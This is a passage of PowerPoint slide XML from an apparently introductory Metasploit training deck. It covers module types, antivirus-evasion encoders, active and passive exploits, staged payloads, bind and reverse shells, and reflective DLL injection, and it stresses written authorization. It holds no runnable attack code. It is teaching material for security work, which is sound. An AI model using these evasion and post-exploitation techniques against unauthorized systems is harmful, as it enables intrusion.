              <a:t>Make sure you have authority and written permission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0"/>
              <a:t>from the correct authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Keep meticulous records of your activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22061624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6888-CAE0-714A-9F63-642A7441E3A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Modules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E5CA1F-2843-7E4D-BA07-DD9FEE52D51C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Auxiliary – scanners/brute forcers/other useful tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Encoders - alter shellcode to evade detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>NOPs - allows for creating NOP sleds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Post – post exploitation modules to maintain/expand access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Evasion – antivirus (primarily Defender) evasion techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29467628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Exploits: Active vs. Passive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Active:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Exploit a listening service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Runs in the foreground until it completes or fails (in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> can background it with “exploit -j” - makes it a job)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Passive:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Listen for the connection then return the exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30801813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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Interfaces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -- This is the one to use.  Custom Metasploit command prompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> create a Metasploit payload in various formats and encode it to help evade IPS/AV/etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -- Daemon listening on 55554 that offers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> to anyone connecting (NO AUTH or ENCRYPTION)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -- starts a web-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> interface on port 55555, NO AUTH nor ENCRYPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfcli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -- CLI single-command input, useful for scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36393945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Payloads: Single, Stagers and Stages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Singles are just that, a single payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self-contained code for communicating with a target and performing an action on it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small and simple, good when communication is unidirectional.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adduser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other payloads are broken down into stages and stagers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stager: load the stage across the network and communicate with it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stage: the thing you’re going to do to the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stagers tend to be small and simple: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stages more complex: shell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, VNC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18122132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7B82-FBAD-ED48-9759-B5FABF0641B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why Use Stages For a Payload?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1F159A-F5C8-B247-9F3B-9983DC61D001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Meterpreter and other payloads can be quite large</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Some vulnerabilities give you a limited in how much data you can write/overwrite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Establish a beachhead and then use that beachhead to load larger stages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1141284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Stager Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>: Reverse connection to TCP port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>: Listen on a TCP port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>bind_ipv6_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>: Listen on a TCP port using IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>: tunnel over packets vs an open connection – use http or https for stealth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>reverse_ipv6_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>: Reverse TCP over ipv6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6606584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D736A-0001-E646-8FE4-D54A5DCEB849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bind vs Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{964B7D5B-78EE-C64D-841E-1258EFD00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61880"/>
            <a:ext cx="9144000" cy="4921482"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11539307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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>shell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> access (Windows) or bash (Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>x64/shell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> access of 64-bit Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>OSes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (and x64/): full environment for world domination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: VNC GUI control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>dllinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: Inject DLL of your choice into memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14749723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DLL Injection (Windows)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Reflective DLL used by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>DLL copied to memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Will not show up in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>” command or other DLL listing tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Older “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>patchup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>” method available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>loads DLL by patching the Windows API call associated with injecting code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>This only resides in memory and is not persistent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2681327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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as a Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Tab auto-complete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Tab-Tab shows the list of matches so far</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> or CTRL-L to clear screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>up and down arrows scroll through history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>No pipes or redirects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56029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exploit?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Code or technique used to take advantage of a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Typically involves gaining access to a system to run commands (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>arbitrary code execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Run commands on a remote system (remote code execution)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Elevate low privileged account to run commands as a privileged user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22902490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msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Replaced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
